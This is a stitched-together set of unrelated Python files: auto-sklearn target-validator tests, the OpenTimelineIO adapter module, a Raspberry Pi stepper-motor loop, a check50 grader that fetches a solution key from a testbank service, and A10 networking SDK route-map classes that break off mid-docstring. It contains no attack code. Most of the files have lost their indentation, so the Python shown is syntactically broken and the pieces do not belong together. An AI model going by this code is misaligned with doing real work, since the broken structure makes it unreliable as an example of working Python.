    if len(expected_shape) > 1 and expected_shape[1] == 1:
        # The target should have (N,) dimensionality instead of (N, 1)
        expected_shape = (expected_shape[0], )
    assert expected_shape == np.shape(transformed_y)
assert np.issubdtype(transformed_y.dtype, np.number)
assert validator._is_fitted
    # Because this is classification, we expect an encoder (sparse targets are not encoded)
if not sparse.issparse(input_data_targettest):
assert validator.encoder is not None
# The encoding should be per column
if len(transformed_y.shape) == 1:
assert np.min(transformed_y) == 0
assert np.max(transformed_y) == len(np.unique(transformed_y)) - 1
else:
for col in range(transformed_y.shape[1]):
assert np.min(transformed_y[:, col]) == 0
assert np.max(transformed_y[:, col]) == len(np.unique(transformed_y[:, col])) - 1
# Make sure we can perform inverse transform
y_inverse = validator.inverse_transform(transformed_y)
if hasattr(input_data_targettest, 'dtype'):
# In case of numeric, we need to make sure dtype is preserved
if is_numeric_dtype(input_data_targettest.dtype):
assert y_inverse.dtype == input_data_targettest.dtype
# Then make sure every value is properly inverse-transformed
np.testing.assert_array_equal(np.array(y_inverse), np.array(input_data_targettest))
elif hasattr(input_data_targettest, 'dtypes'):
if is_numeric_dtype(input_data_targettest.dtypes[0]):
assert y_inverse.dtype == input_data_targettest.dtypes[0]
# Then make sure every value is properly inverse-transformed
np.testing.assert_array_equal(np.array(y_inverse),
# pandas is always (N, 1) but targets are ravel()
input_data_targettest.to_numpy().reshape(-1))
else:
# Sparse is not encoded, mainly because the sparse data is expected
# to be numpy of numerical type -- which currently does not require encoding
np.testing.assert_array_equal(
np.ravel(input_data_targettest.todense()),
np.ravel(transformed_y.todense())
)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'pandas_binary',
'numpy_binary',
'list_binary',
'openml_1066',
),
indirect=True
)
def test_targetvalidator_binary(input_data_targettest):
assert type_of_target(input_data_targettest) == 'binary'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'binary'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_multiclass',
'pandas_multiclass',
'numpy_multiclass',
'list_multiclass',
'openml_54',
),
indirect=True
)
def test_targetvalidator_multiclass(input_data_targettest):
assert type_of_target(input_data_targettest) == 'multiclass'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'multiclass'
@pytest.mark.parametrize(
'input_data_targettest',
(
'pandas_multilabel',
'numpy_multilabel',
'list_multilabel',
'openml_40594',
),
indirect=True
)
def test_targetvalidator_multilabel(input_data_targettest):
assert type_of_target(input_data_targettest) == 'multilabel-indicator'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'multilabel-indicator'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_continuous',
'pandas_continuous',
'numpy_continuous',
'list_continuous',
'openml_531',
),
indirect=True
)
def test_targetvalidator_continuous(input_data_targettest):
assert type_of_target(input_data_targettest) == 'continuous'
validator = TargetValidator(is_classification=False)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'continuous'
@pytest.mark.parametrize(
'input_data_targettest',
(
'pandas_continuous-multioutput',
'numpy_continuous-multioutput',
'list_continuous-multioutput',
'openml_41483',
),
indirect=True
)
def test_targetvalidator_continuous_multioutput(input_data_targettest):
assert type_of_target(input_data_targettest) == 'continuous-multioutput'
validator = TargetValidator(is_classification=False)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'continuous-multioutput'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'pandas_binary',
'numpy_binary',
'list_binary',
),
indirect=True
)
def test_targetvalidator_fitontypeA_transformtypeB(input_data_targettest):
"""
Check if we can fit in a given type (numpy) yet transform
if the user changes the type (pandas then)
This is problematic only in the case we create an encoder
"""
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
if isinstance(input_data_targettest, pd.DataFrame):
complementary_type = input_data_targettest.to_numpy()
elif isinstance(input_data_targettest, pd.Series):
complementary_type = pd.DataFrame(input_data_targettest)
elif isinstance(input_data_targettest, np.ndarray):
complementary_type = pd.DataFrame(input_data_targettest)
elif isinstance(input_data_targettest, list):
complementary_type = pd.DataFrame(input_data_targettest)
validator.transform(complementary_type)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_multilabel',
'series_continuous-multioutput',
),
indirect=True
)
def test_type_of_target_unsupported(input_data_targettest):
"""
Makes sure we raise a proper message to the user,
when providing not supported data input
"""
validator = TargetValidator()
with pytest.raises(ValueError, match=r"legacy multi-.* data representation."):
validator.fit(input_data_targettest)
def test_target_unsupported():
"""
Makes sure we raise a proper message to the user,
when providing not supported data input
"""
validator = TargetValidator(is_classification=True)
with pytest.raises(ValueError, match=r"The dimensionality of the train and test targets"):
validator.fit(
np.array([[0, 1, 0], [0, 1, 1]]),
np.array([[0, 1, 0, 0], [0, 1, 1, 1]]),
)
with pytest.raises(ValueError, match=r"Train and test targets must both have the same dtypes"):
validator.fit(
pd.DataFrame({'a': [1, 2, 3]}),
pd.DataFrame({'a': [True, False, False]}),
)
with pytest.raises(ValueError, match=r"Provided targets are not supported.*"):
validator.fit(
np.array([[0, 1, 2], [0, 3, 4]]),
np.array([[0, 1, 2, 5], [0, 3, 4, 6]]),
)
with pytest.raises(ValueError, match="Train and test targets must both have the same"):
validator.fit(
pd.DataFrame({'string': ['foo']}),
pd.DataFrame({'int': [1]}),
)
with pytest.raises(ValueError, match=r"Auto-sklearn only supports Numpy arrays, .*"):
validator.fit({'input1': 1, 'input2': 2})
with pytest.raises(ValueError, match=r"arget values cannot contain missing/NaN values"):
validator.fit(np.array([np.nan, 1, 2]))
with pytest.raises(ValueError, match=r"arget values cannot contain missing/NaN values"):
validator.fit(sparse.csr_matrix(np.array([1, 2, np.nan])))
with pytest.raises(ValueError, match=r"Cannot call transform on a validator that is not fit"):
validator.transform(np.array([1, 2, 3]))
with pytest.raises(ValueError, match=r"Cannot call inverse_transform on a validator that is"):
validator.inverse_transform(np.array([1, 2, 3]))
with pytest.raises(ValueError, match=r"Multi-dimensional classification is not yet supported"):
validator._fit(np.array([[1, 2, 3], [1, 5, 6]]))
# Dia/ DOK are not supported as type of target makes calls len on the array
# which causes TypeError: len() of unsized object. Basically, sparse data as
# multi-label is the only thing that makes sense in this format.
with pytest.raises(ValueError, match=r"The provided data could not be interpreted by Sklearn"):
validator.fit(sparse.dia_matrix(np.array([1, 2, 3])))
validator.fit(np.array([[0, 1, 0], [0, 1, 1]]))
with pytest.raises(ValueError, match=r"Number of outputs changed from"):
validator.fit(np.array([0, 1, 0]))
def test_targetvalidator_inversetransform():
"""
Test that the encoding/decoding works in 1D
"""
validator = TargetValidator(is_classification=True)
validator.fit(
pd.DataFrame(data=['a', 'a', 'b', 'c', 'a'], dtype='category'),
)
y = validator.transform(
pd.DataFrame(data=['a', 'a', 'b', 'c', 'a'], dtype='category'),
)
np.testing.assert_array_almost_equal(np.array([0, 0, 1, 2, 0]), y)
y_decoded = validator.inverse_transform(y)
assert ['a', 'a', 'b', 'c', 'a'] == y_decoded.tolist()
assert validator.classes_.tolist() == ['a', 'b', 'c']
validator = TargetValidator(is_classification=True)
multi_label = pd.DataFrame(
np.array([[1, 0, 0, 1], [0, 0, 1, 1], [0, 0, 0, 0]]),
dtype=bool
)
validator.fit(multi_label)
y = validator.transform(multi_label)
y_decoded = validator.inverse_transform(y)
np.testing.assert_array_almost_equal(y, y_decoded)
# Multilabel classification is not encoded
# For this reason, classes_ attribute does not contain a class
np.testing.assert_array_almost_equal(validator.classes_, np.array([]))
# Actual checks for the targets
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'pandas_binary',
'pandas_multiclass',
'numpy_binary',
'numpy_multiclass',
'list_binary',
'list_multiclass',
),
indirect=True
)
def test_unknown_categories_in_targets(input_data_targettest):
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
# Add an extra category
if isinstance(input_data_targettest, list):
input_data_targettest.append(input_data_targettest[-1] + 5000)
elif isinstance(input_data_targettest, (pd.DataFrame, pd.Series)):
input_data_targettest.iloc[-1] = 5000
elif isinstance(input_data_targettest, np.ndarray):
input_data_targettest[-1] = 5000
x_t = validator.transform(input_data_targettest)
assert x_t[-1].item(0) == -1
def test_is_single_column_target():
validator = TargetValidator(is_classification=True)
validator.fit(np.array([1, 2, 3, 4]))
assert validator.is_single_column_target()
validator = TargetValidator(is_classification=True)
validator.fit(np.array([[1, 0, 1, 0], [1, 1, 1, 1]]))
assert not validator.is_single_column_target()
|
#
# Copyright 2017 Pixar Animation Studios
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Implementation of the OTIO internal `Adapter` system.
For information on writing adapters, please consult:
https://opentimelineio.readthedocs.io/en/latest/tutorials/write-an-adapter.html# # noqa
"""
import inspect
import collections
from .. import (
core,
plugins,
media_linker,
hooks,
)
@core.register_type
class Adapter(plugins.PythonPlugin):
"""Adapters convert between OTIO and other formats.
Note that this class is not subclassed by adapters. Rather, an adapter is
a python module that implements at least one of the following functions:
write_to_string(input_otio)
write_to_file(input_otio, filepath) (optionally inferred)
read_from_string(input_str)
read_from_file(filepath) (optionally inferred)
...as well as a small json file that advertises the features of the adapter
to OTIO. This class serves as the wrapper around these modules internal
to OTIO. You should not need to extend this class to create new adapters
for OTIO.
For more information:
https://opentimelineio.readthedocs.io/en/latest/tutorials/write-an-adapter.html# # noqa
"""
_serializable_label = "Adapter.1"
def __init__(
self,
name=None,
execution_scope=None,
filepath=None,
suffixes=None
):
plugins.PythonPlugin.__init__(
self,
name,
execution_scope,
filepath
)
self.suffixes = suffixes or []
suffixes = core.serializable_field(
"suffixes",
type([]),
doc="File suffixes associated with this adapter."
)
def has_feature(self, feature_string):
"""
return true if adapter supports feature_string, which must be a key
of the _FEATURE_MAP dictionary.
Will trigger a call to self.module(), which imports the plugin.
"""
if feature_string.lower() not in _FEATURE_MAP:
return False
search_strs = _FEATURE_MAP[feature_string]
try:
return any(hasattr(self.module(), s) for s in search_strs)
except ImportError:
# @TODO: should issue a warning that the plugin was not importable?
return False
def read_from_file(
self,
filepath,
media_linker_name=media_linker.MediaLinkingPolicy.ForceDefaultLinker,
media_linker_argument_map=None,
hook_function_argument_map={},
**adapter_argument_map
):
"""Execute the read_from_file function on this adapter.
If read_from_string exists, but not read_from_file, execute that with
a trivial file object wrapper.
"""
if media_linker_argument_map is None:
media_linker_argument_map = {}
result = None
if (
not self.has_feature("read_from_file") and
self.has_feature("read_from_string")
):
with open(filepath, 'r') as fo:
contents = fo.read()
result = self._execute_function(
"read_from_string",
input_str=contents,
**adapter_argument_map
)
else:
result = self._execute_function(
"read_from_file",
filepath=filepath,
**adapter_argument_map
)
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
hook_function_argument_map['media_linker_argument_map'] = \
media_linker_argument_map
result = hooks.run("post_adapter_read", result,
extra_args=hook_function_argument_map)
if media_linker_name and (
media_linker_name != media_linker.MediaLinkingPolicy.DoNotLinkMedia
):
_with_linked_media_references(
result,
media_linker_name,
media_linker_argument_map
)
result = hooks.run("post_media_linker", result,
extra_args=media_linker_argument_map)
return result
def write_to_file(
self,
input_otio,
filepath,
hook_function_argument_map={},
**adapter_argument_map
):
"""Execute the write_to_file function on this adapter.
If write_to_string exists, but not write_to_file, execute that with
a trivial file object wrapper.
"""
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
input_otio = hooks.run("pre_adapter_write", input_otio,
extra_args=hook_function_argument_map)
if (
not self.has_feature("write_to_file") and
self.has_feature("write_to_string")
):
result = self.write_to_string(input_otio, **adapter_argument_map)
with open(filepath, 'w') as fo:
fo.write(result)
return filepath
return self._execute_function(
"write_to_file",
input_otio=input_otio,
filepath=filepath,
**adapter_argument_map
)
def read_from_string(
self,
input_str,
media_linker_name=media_linker.MediaLinkingPolicy.ForceDefaultLinker,
media_linker_argument_map=None,
hook_function_argument_map={},
**adapter_argument_map
):
"""Call the read_from_string function on this adapter."""
result = self._execute_function(
"read_from_string",
input_str=input_str,
**adapter_argument_map
)
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
hook_function_argument_map['media_linker_argument_map'] = \
media_linker_argument_map
result = hooks.run("post_adapter_read", result,
extra_args=hook_function_argument_map)
if media_linker_name and (
media_linker_name != media_linker.MediaLinkingPolicy.DoNotLinkMedia
):
_with_linked_media_references(
result,
media_linker_name,
media_linker_argument_map
)
# @TODO: Should this run *ONLY* if the media linker ran?
result = hooks.run("post_media_linker", result,
extra_args=hook_function_argument_map)
return result
def write_to_string(
self,
input_otio,
hook_function_argument_map={},
**adapter_argument_map
):
"""Call the write_to_string function on this adapter."""
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
input_otio = hooks.run("pre_adapter_write", input_otio,
extra_args=hook_function_argument_map)
return self._execute_function(
"write_to_string",
input_otio=input_otio,
**adapter_argument_map
)
def __str__(self):
return (
"Adapter("
"{}, "
"{}, "
"{}, "
"{}"
")".format(
repr(self.name),
repr(self.execution_scope),
repr(self.filepath),
repr(self.suffixes),
)
)
def __repr__(self):
return (
"otio.adapter.Adapter("
"name={}, "
"execution_scope={}, "
"filepath={}, "
"suffixes={}"
")".format(
repr(self.name),
repr(self.execution_scope),
repr(self.filepath),
repr(self.suffixes),
)
)
def plugin_info_map(self):
"""Adds extra adapter-specific information to call to the parent fn."""
result = super(Adapter, self).plugin_info_map()
features = collections.OrderedDict()
result["supported features"] = features
for feature in sorted(_FEATURE_MAP.keys()):
if feature in ["read", "write"]:
continue
if self.has_feature(feature):
features[feature] = collections.OrderedDict()
# find the function
args = []
for fn_name in _FEATURE_MAP[feature]:
if hasattr(self.module(), fn_name):
fn = getattr(self.module(), fn_name)
args = inspect.getargspec(fn)
docs = inspect.getdoc(fn)
break
if args:
features[feature]["args"] = args.args
features[feature]["doc"] = docs
return result
def _with_linked_media_references(
read_otio,
media_linker_name,
media_linker_argument_map
):
"""Link media references in the read_otio if possible.
Makes changes in place and returns the read_otio structure back.
"""
if not read_otio or not media_linker.from_name(media_linker_name):
return read_otio
# not every object the adapter reads has an "each_clip" method, so this
# skips objects without one.
clpfn = getattr(read_otio, "each_clip", None)
if clpfn is None:
return read_otio
for cl in read_otio.each_clip():
new_mr = media_linker.linked_media_reference(
cl,
media_linker_name,
# @TODO: should any context get wired in at this point?
media_linker_argument_map
)
if new_mr is not None:
cl.media_reference = new_mr
return read_otio
# map of attr to look for vs feature name in the adapter plugin
_FEATURE_MAP = {
'read_from_file': ['read_from_file'],
'read_from_string': ['read_from_string'],
'read': ['read_from_file', 'read_from_string'],
'write_to_file': ['write_to_file'],
'write_to_string': ['write_to_string'],
'write': ['write_to_file', 'write_to_string']
}
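# A minimal sketch of what an adapter module could look like, based on the
# contract described in the Adapter docstring above. The module name
# "my_format" and the manifest fields shown are hypothetical examples, not an
# existing plugin; consult the write-an-adapter tutorial for the real layout.
#
#   # my_format.py
#   def read_from_string(input_str):
#       """Parse input_str and return an otio.schema.Timeline."""
#       ...
#
#   def write_to_string(input_otio):
#       """Serialize input_otio and return a str."""
#       ...
#
# ...plus a small JSON manifest entry that advertises the adapter to OTIO,
# mirroring the constructor arguments above (name, execution_scope, filepath,
# suffixes).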
|
import RPi.GPIO as GPIO
from time import sleep
# Direction pin from controller
DIR = 10
# Step pin from controller
STEP = 8
# 0/1 used to signify clockwise or counterclockwise.
CW = 1
CCW = 0
# Setup pin layout on PI
GPIO.setmode(GPIO.BOARD)
# Establish Pins in software
GPIO.setup(DIR, GPIO.OUT)
GPIO.setup(STEP, GPIO.OUT)
# Set the first direction you want it to spin
GPIO.output(DIR, CW)
try:
# Run forever.
while True:
"""Change Direction: Changing direction requires time to switch. The
time is dictated by the stepper motor and controller. """
sleep(1.0)
# Establish the direction you want to go
GPIO.output(DIR,CW)
# Run for 200 steps. This will change based on how you set your controller
for x in range(200):
# Set one coil winding to high
GPIO.output(STEP,GPIO.HIGH)
# Allow it to get there.
sleep(.005) # Dictates how fast stepper motor will run
# Set coil winding to low
GPIO.output(STEP,GPIO.LOW)
sleep(.005) # Dictates how fast stepper motor will run
"""Change Direction: Changing direction requires time to switch. The
time is dictated by the stepper motor and controller. """
sleep(1.0)
GPIO.output(DIR,CCW)
for x in range(200):
GPIO.output(STEP,GPIO.HIGH)
sleep(.005)
GPIO.output(STEP,GPIO.LOW)
sleep(.005)
# Once finished clean everything up
except KeyboardInterrupt:
print("cleanup")
GPIO.cleanup()
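# Illustrative sketch only (not used by the script above): the two stepping
# loops could be factored into a single helper. The name `spin` and its
# parameters are hypothetical.
def spin(direction, steps, delay=.005):
    """Pulse the STEP pin `steps` times after latching `direction` on DIR."""
    GPIO.output(DIR, direction)
    # Give the motor/controller time to register the direction change.
    sleep(1.0)
    for _ in range(steps):
        GPIO.output(STEP, GPIO.HIGH)
        sleep(delay)  # pulse width; dictates how fast the stepper runs
        GPIO.output(STEP, GPIO.LOW)
        sleep(delay)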
|
import check50
import numpy as np
import requests
# random seed generated and then passed to TestBank to prevent cheating
ui32 = np.iinfo(np.uint32)
seed = np.random.randint(1, ui32.max)
params = {'seed': seed, 'solution': True}
r = requests.get('https://testbank.roualdes.us/ey0C', params=params)
sol = r.json()['solutions']
@check50.check()
def exists():
"""uniform.py exists."""
check50.exists("uniform.py")
@check50.check(exists)
def compiles():
"""uniform.py produces correct answer."""
check50.run("python uniform.py {}".format(seed)).stdout(str(sol)+'\n').exit()
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Rt(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"type": "string", "description": "VPN extended community", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "rt"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Soo(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"type": "string", "description": "VPN extended community", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "soo"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Extcommunity(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "extcommunity"
self.DeviceProxy = ""
self.rt = {}
self.soo = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Origin(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param egp: {"default": 0, "not-list": ["igp", "incomplete"], "type": "number", "description": "remote EGP", "format": "flag"}
:param incomplete: {"default": 0, "not-list": ["egp", "igp"], "type": "number", "description": "unknown heritage", "format": "flag"}
:param igp: {"default": 0, "not-list": ["egp", "incomplete"], "type": "number", "description": "local IGP", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "origin"
self.DeviceProxy = ""
self.egp = ""
self.incomplete = ""
self.igp = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AggregatorAs(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ip: {"type": "string", "description": "IP address of aggregator", "format": "ipv4-address"}
:param asn: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "aggregator-as"
self.DeviceProxy = ""
self.ip = ""
self.asn = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Aggregator(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "aggregator"
self.DeviceProxy = ""
self.aggregator_as = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Weight(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param weight_val: {"description": "Weight value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "weight"
self.DeviceProxy = ""
self.weight_val = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Level(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"enum": ["level-1", "level-1-2", "level-2"], "type": "string", "description": "'level-1': Export into a level-1 area; 'level-1-2': Export into level-1 and level-2; 'level-2': Export into level-2 sub-domain; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "level"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class NextHop(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "IP address of next hop", "format": "ipv4-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "next-hop"
self.DeviceProxy = ""
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Ip(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ip"
self.DeviceProxy = ""
self.next_hop = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Metric(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"minLength": 1, "maxLength": 128, "type": "string", "description": "Metric value", "format": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AsPath(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param num: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param num2: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param prepend: {"type": "string", "description": "Prepend to the as-path (AS number)", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "as-path"
self.DeviceProxy = ""
self.num = ""
self.num2 = ""
self.prepend = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class CommList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param name: {"description": "Community-list name", "format": "string", "minLength": 1, "not-list": ["v-std", "v-exp"], "maxLength": 128, "type": "string"}
:param v_std: {"description": "Community-list number (standard)", "format": "number", "not-list": ["v-exp", "name"], "maximum": 99, "minimum": 1, "type": "number"}
:param v_exp_delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param v_exp: {"description": "Community-list number (expanded)", "format": "number", "not-list": ["v-std", "name"], "maximum": 199, "minimum": 100, "type": "number"}
:param name_delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "comm-list"
self.DeviceProxy = ""
self.name = ""
self.v_std = ""
self.v_exp_delete = ""
self.v_exp = ""
self.name_delete = ""
self.delete = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class LocalPreference(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param val: {"description": "Preference value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "local-preference"
self.DeviceProxy = ""
self.val = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Tag(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"description": "Tag value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "tag"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Local(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "IPv6 address of next hop", "format": "ipv6-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "local"
self.DeviceProxy = ""
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class NextHop1(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "global address of next hop", "format": "ipv6-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "next-hop-1"
self.DeviceProxy = ""
self.local = {}
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Ipv6(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ipv6"
self.DeviceProxy = ""
self.next_hop_1 = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class DampeningCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param dampening_max_supress: {"description": "Maximum duration to suppress a stable route(minutes)", "minimum": 1, "type": "number", "maximum": 255, "format": "number"}
:param dampening: {"default": 0, "type": "number", "description": "Enable route-flap dampening", "format": "flag"}
:param dampening_penalty: {"description": "Un-reachability Half-life time for the penalty(minutes)", "minimum": 1, "type": "number", "maximum": 45, "format": "number"}
:param dampening_half_time: {"description": "Reachability Half-life time for the penalty(minutes)", "minimum": 1, "type": "number", "maximum": 45, "format": "number"}
:param dampening_supress: {"description": "Value to start suppressing a route", "minimum": 1, "type": "number", "maximum": 20000, "format": "number"}
:param dampening_reuse: {"description": "Value to start reusing a route", "minimum": 1, "type": "number", "maximum": 20000, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "dampening-cfg"
self.DeviceProxy = ""
self.dampening_max_supress = ""
self.dampening = ""
self.dampening_penalty = ""
self.dampening_half_time = ""
self.dampening_supress = ""
self.dampening_reuse = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class OriginatorId(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param originator_ip: {"type": "string", "description": "IP address of originator", "format": "ipv4-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "originator-id"
self.DeviceProxy = ""
self.originator_ip = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MetricType(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"enum": ["external", "internal", "type-1", "type-2"], "type": "string", "description": "'external': IS-IS external metric type; 'internal': IS-IS internal metric type; 'type-1': OSPF external type 1 metric; 'type-2': OSPF external type 2 metric; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric-type"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Set(A10BaseClass):
"""Class Description::
Set values in destination routing protocol.
Class set supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.
:param atomic_aggregate: {"default": 0, "optional": true, "type": "number", "description": "BGP atomic aggregate attribute", "format": "flag"}
:param community: {"optional": true, "type": "string", "description": "BGP community attribute", "format": "string-rlx"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
